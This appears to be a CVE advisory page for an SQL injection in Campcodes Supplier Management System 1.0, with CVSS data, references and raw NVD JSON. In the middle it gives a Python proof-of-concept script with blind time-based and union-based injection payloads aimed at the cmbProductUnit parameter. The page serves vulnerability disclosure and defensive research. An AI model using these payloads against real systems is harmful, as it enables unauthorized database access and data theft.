CVE-2025-13260

Description

A vulnerability has been found in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /manufacturer/edit_product.php. Such manipulation of the argument cmbProductUnit leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:campcodes:supplier_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes Supplier Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13260 SQL Injection PoC
# Target: Campcodes Supplier Management System 1.0
# Endpoint: /manufacturer/edit_product.php
# Parameter: cmbProductUnit

TARGET_URL = "http://target.com/manufacturer/edit_product.php"

# Blind SQL Injection Payload - Extract database version
PAYLOAD_BLIND = "1' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN SLEEP(5) ELSE 0 END) AND '1'='1"

# Union-based Injection Payload - Extract current database and user
PAYLOAD_UNION = "1' UNION SELECT NULL,database(),user(),version(),NULL-- -"

def exploit_blind_sqli():
    """Blind SQL injection to extract data character by character"""
    print("[*] Attempting blind SQL injection...")
    params = {
        'id': '1',
        'cmbProductUnit': PAYLOAD_BLIND
    }
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Blind SQL injection confirmed! Database version starts with '5'")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    return False

def exploit_union_sqli():
    """Union-based SQL injection to extract database information"""
    print("[*] Attempting union-based SQL injection...")
    params = {
        'id': '1',
        'cmbProductUnit': PAYLOAD_UNION
    }
    try:
        response = requests.get(TARGET_URL, params=params)
        if 'information_schema' in response.text or 'mysql' in response.text.lower():
            print("[+] Union SQL injection successful! Database info extracted")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    return False

if __name__ == "__main__":
    print("CVE-2025-13260 SQL Injection PoC")
    print("=" * 50)
    exploit_blind_sqli()
    exploit_union_sqli()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13260
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13260
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13260/
[4] VulDB https://vuldb.com/cve/CVE-2025-13260
[5] https://github.com/arpcyber070/CVE/issues/1
[6] https://vuldb.com/?ctiid.332595
[7] https://vuldb.com/?id.332595
[8] https://vuldb.com/?submit.689268
[9] https://vuldb.com/?submit.724933
[10] https://www.campcodes.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13260", "sourceIdentifier": "[email protected]", "published": "2025-11-17T04:15:54.060", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /manufacturer/edit_product.php. Such manipulation of the argument cmbProductUnit leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:supplier_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "836654A6-0614-4B2F-A556-E005AF4C7DE1"}]}]}], "references": [{"url": "https://github.com/arpcyber070/CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332595", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332595", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.689268", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.724933", "source": "[email protected]"}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}]}}